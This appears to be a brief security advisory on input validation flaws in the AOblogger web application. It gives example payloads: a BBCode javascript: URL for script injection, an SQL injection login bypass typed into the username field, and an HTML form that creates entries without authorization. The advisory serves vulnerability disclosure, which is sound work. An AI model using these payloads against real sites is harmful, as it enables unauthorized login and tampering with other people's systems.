|
|
AOblogger Multiple Input Validation Vulnerabilities
An exploit is not required. A BBCode tag script-injection example has been provided: [url]javascript:alert(123)[/url] An SQ- injection example has been provided: http://www.example.com/aoblogger/login.php username: username'/* password: any An example of new entry creation without proper authorization has been provided: <form action="http://www.example.com/aoblogger/create.php" method="post"> <input name="uza" value=1> <input name="title" value="anytitle"> <textarea name="message">anymessage</textarea> </form> |
|
Privacy Statement |